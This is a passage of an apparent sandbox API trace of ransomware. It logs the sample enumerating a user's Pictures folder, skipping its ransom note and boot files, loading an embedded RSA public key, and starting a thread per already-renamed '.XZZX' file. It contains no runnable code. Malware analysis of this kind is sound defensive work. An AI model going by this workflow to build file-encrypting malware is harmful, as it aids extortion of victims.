lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0191.433] StrStrW (lpFirst="615936DC32228B708230065136576FB8.XZZX", lpSrch="ntldr") returned 0x0 [0191.433] StrStrW (lpFirst="615936DC32228B708230065136576FB8.XZZX", lpSrch="NTLDR") returned 0x0 [0191.433] StrStrW (lpFirst="615936DC32228B708230065136576FB8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0191.433] StrStrW (lpFirst="615936DC32228B708230065136576FB8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0191.433] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0191.433] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0191.433] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0191.433] lstrcpyW (in: lpString1=0x17cf1c, lpString2="615936DC32228B708230065136576FB8.XZZX" | out: lpString1="615936DC32228B708230065136576FB8.XZZX") returned="615936DC32228B708230065136576FB8.XZZX" [0191.433] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0191.433] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xca8 [0191.434] Sleep (dwMilliseconds=0x96) [0191.589] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0191.589] lstrcmpW (lpString1="6274BC861B7171923C3788AB1F9255DA.XZZX", lpString2="..") returned 1 [0191.589] lstrcmpW (lpString1="6274BC861B7171923C3788AB1F9255DA.XZZX", lpString2=".") returned 1 [0191.589] StrStrW (lpFirst="6274BC861B7171923C3788AB1F9255DA.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0191.589] StrStrW (lpFirst="6274BC861B7171923C3788AB1F9255DA.XZZX", lpSrch="ntldr") returned 0x0 [0191.589] StrStrW (lpFirst="6274BC861B7171923C3788AB1F9255DA.XZZX", lpSrch="NTLDR") returned 0x0 [0191.589] StrStrW (lpFirst="6274BC861B7171923C3788AB1F9255DA.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0191.589] StrStrW (lpFirst="6274BC861B7171923C3788AB1F9255DA.XZZX", lpSrch="ntdetect.com") returned 0x0 [0191.589] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0191.589] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0191.589] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0191.589] lstrcpyW (in: lpString1=0x17cf1c, lpString2="6274BC861B7171923C3788AB1F9255DA.XZZX" | out: lpString1="6274BC861B7171923C3788AB1F9255DA.XZZX") returned="6274BC861B7171923C3788AB1F9255DA.XZZX" [0191.589] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0191.589] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xcac [0191.590] WaitForSingleObject (hHandle=0xcac, dwMilliseconds=0xffffffff) returned 0x0 [0191.591] Sleep (dwMilliseconds=0x96) [0191.754] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0191.754] lstrcmpW (lpString1="693610CE0E824D54F2368B0112B7319C.XZZX", lpString2="..") returned 1 [0191.754] lstrcmpW (lpString1="693610CE0E824D54F2368B0112B7319C.XZZX", lpString2=".") returned 1 [0191.754] StrStrW (lpFirst="693610CE0E824D54F2368B0112B7319C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0191.754] StrStrW (lpFirst="693610CE0E824D54F2368B0112B7319C.XZZX", lpSrch="ntldr") returned 0x0 [0191.754] StrStrW (lpFirst="693610CE0E824D54F2368B0112B7319C.XZZX", lpSrch="NTLDR") returned 0x0 [0191.754] StrStrW (lpFirst="693610CE0E824D54F2368B0112B7319C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0191.754] StrStrW (lpFirst="693610CE0E824D54F2368B0112B7319C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0191.754] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0191.754] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0191.754] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0191.754] lstrcpyW (in: lpString1=0x17cf1c, lpString2="693610CE0E824D54F2368B0112B7319C.XZZX" | out: lpString1="693610CE0E824D54F2368B0112B7319C.XZZX") returned="693610CE0E824D54F2368B0112B7319C.XZZX" [0191.754] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0191.754] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xcb0 [0191.755] Sleep (dwMilliseconds=0x96) [0191.901] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0191.901] lstrcmpW (lpString1="6C73D824191052A8389547C51D5A36F0.XZZX", lpString2="..") returned 1 [0191.901] lstrcmpW (lpString1="6C73D824191052A8389547C51D5A36F0.XZZX", lpString2=".") returned 1 [0191.901] StrStrW (lpFirst="6C73D824191052A8389547C51D5A36F0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0191.901] StrStrW (lpFirst="6C73D824191052A8389547C51D5A36F0.XZZX", lpSrch="ntldr") returned 0x0 [0191.901] StrStrW (lpFirst="6C73D824191052A8389547C51D5A36F0.XZZX", lpSrch="NTLDR") returned 0x0 [0191.901] StrStrW (lpFirst="6C73D824191052A8389547C51D5A36F0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0191.901] StrStrW (lpFirst="6C73D824191052A8389547C51D5A36F0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0191.901] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0191.901] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0191.901] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0191.901] lstrcpyW (in: lpString1=0x17cf1c, lpString2="6C73D824191052A8389547C51D5A36F0.XZZX" | out: lpString1="6C73D824191052A8389547C51D5A36F0.XZZX") returned="6C73D824191052A8389547C51D5A36F0.XZZX" [0191.902] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0191.902] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xcb4 [0191.902] Sleep (dwMilliseconds=0x96) [0192.057] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0192.057] lstrcmpW (lpString1="6D777C541DA727448F863C8E21C80B8C.XZZX", lpString2="..") returned 1 [0192.057] lstrcmpW (lpString1="6D777C541DA727448F863C8E21C80B8C.XZZX", lpString2=".") returned 1 [0192.057] StrStrW (lpFirst="6D777C541DA727448F863C8E21C80B8C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0192.057] StrStrW (lpFirst="6D777C541DA727448F863C8E21C80B8C.XZZX", lpSrch="ntldr") returned 0x0 [0192.057] StrStrW (lpFirst="6D777C541DA727448F863C8E21C80B8C.XZZX", lpSrch="NTLDR") returned 0x0 [0192.057] StrStrW (lpFirst="6D777C541DA727448F863C8E21C80B8C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0192.057] StrStrW (lpFirst="6D777C541DA727448F863C8E21C80B8C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0192.057] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0192.057] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0192.057] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0192.057] lstrcpyW (in: lpString1=0x17cf1c, lpString2="6D777C541DA727448F863C8E21C80B8C.XZZX" | out: lpString1="6D777C541DA727448F863C8E21C80B8C.XZZX") returned="6D777C541DA727448F863C8E21C80B8C.XZZX" [0192.057] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0192.057] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xcb8 [0192.058] Sleep (dwMilliseconds=0x96) [0192.213] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0192.213] lstrcmpW (lpString1="6E0684500109FC98CFD71110053FE0E0.XZZX", lpString2="..") returned 1 [0192.213] lstrcmpW (lpString1="6E0684500109FC98CFD71110053FE0E0.XZZX", lpString2=".") returned 1 [0192.213] StrStrW (lpFirst="6E0684500109FC98CFD71110053FE0E0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0192.213] StrStrW (lpFirst="6E0684500109FC98CFD71110053FE0E0.XZZX", lpSrch="ntldr") returned 0x0 [0192.213] StrStrW (lpFirst="6E0684500109FC98CFD71110053FE0E0.XZZX", lpSrch="NTLDR") returned 0x0 [0192.213] StrStrW (lpFirst="6E0684500109FC98CFD71110053FE0E0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0192.213] StrStrW (lpFirst="6E0684500109FC98CFD71110053FE0E0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0192.213] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0192.213] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0192.213] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0192.213] lstrcpyW (in: lpString1=0x17cf1c, lpString2="6E0684500109FC98CFD71110053FE0E0.XZZX" | out: lpString1="6E0684500109FC98CFD71110053FE0E0.XZZX") returned="6E0684500109FC98CFD71110053FE0E0.XZZX" [0192.213] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0192.213] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xcbc [0192.214] Sleep (dwMilliseconds=0x96) [0192.369] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0192.369] lstrcmpW (lpString1="7030D20732FB05AE512C0EDB3744E9F6.XZZX", lpString2="..") returned 1 [0192.369] lstrcmpW (lpString1="7030D20732FB05AE512C0EDB3744E9F6.XZZX", lpString2=".") returned 1 [0192.369] StrStrW (lpFirst="7030D20732FB05AE512C0EDB3744E9F6.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0192.369] StrStrW (lpFirst="7030D20732FB05AE512C0EDB3744E9F6.XZZX", lpSrch="ntldr") returned 0x0 [0192.369] StrStrW (lpFirst="7030D20732FB05AE512C0EDB3744E9F6.XZZX", lpSrch="NTLDR") returned 0x0 [0192.369] StrStrW (lpFirst="7030D20732FB05AE512C0EDB3744E9F6.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0192.369] StrStrW (lpFirst="7030D20732FB05AE512C0EDB3744E9F6.XZZX", lpSrch="ntdetect.com") returned 0x0 [0192.369] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0192.369] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0192.370] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0192.370] lstrcpyW (in: lpString1=0x17cf1c, lpString2="7030D20732FB05AE512C0EDB3744E9F6.XZZX" | out: lpString1="7030D20732FB05AE512C0EDB3744E9F6.XZZX") returned="7030D20732FB05AE512C0EDB3744E9F6.XZZX" [0192.370] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0192.370] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xcc0 [0192.370] Sleep (dwMilliseconds=0x96) [0192.525] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0192.525] lstrcmpW (lpString1="7852C7A011E028AD2E2E29A016150CF5.XZZX", lpString2="..") returned 1 [0192.525] lstrcmpW (lpString1="7852C7A011E028AD2E2E29A016150CF5.XZZX", lpString2=".") returned 1 [0192.525] StrStrW (lpFirst="7852C7A011E028AD2E2E29A016150CF5.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0192.525] StrStrW (lpFirst="7852C7A011E028AD2E2E29A016150CF5.XZZX", lpSrch="ntldr") returned 0x0 [0192.525] StrStrW (lpFirst="7852C7A011E028AD2E2E29A016150CF5.XZZX", lpSrch="NTLDR") returned 0x0 [0192.525] StrStrW (lpFirst="7852C7A011E028AD2E2E29A016150CF5.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0192.525] StrStrW (lpFirst="7852C7A011E028AD2E2E29A016150CF5.XZZX", lpSrch="ntdetect.com") returned 0x0 [0192.525] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0192.525] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0192.525] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0192.525] lstrcpyW (in: lpString1=0x17cf1c, lpString2="7852C7A011E028AD2E2E29A016150CF5.XZZX" | out: lpString1="7852C7A011E028AD2E2E29A016150CF5.XZZX") returned="7852C7A011E028AD2E2E29A016150CF5.XZZX" [0192.525] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0192.525] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xcc4 [0192.526] Sleep (dwMilliseconds=0x96) [0192.681] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0192.681] lstrcmpW (lpString1="7ABC26D22C977F5CF918EABE30B863A4.XZZX", lpString2="..") returned 1 [0192.681] lstrcmpW (lpString1="7ABC26D22C977F5CF918EABE30B863A4.XZZX", lpString2=".") returned 1 [0192.681] StrStrW (lpFirst="7ABC26D22C977F5CF918EABE30B863A4.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0192.681] StrStrW (lpFirst="7ABC26D22C977F5CF918EABE30B863A4.XZZX", lpSrch="ntldr") returned 0x0 [0192.681] 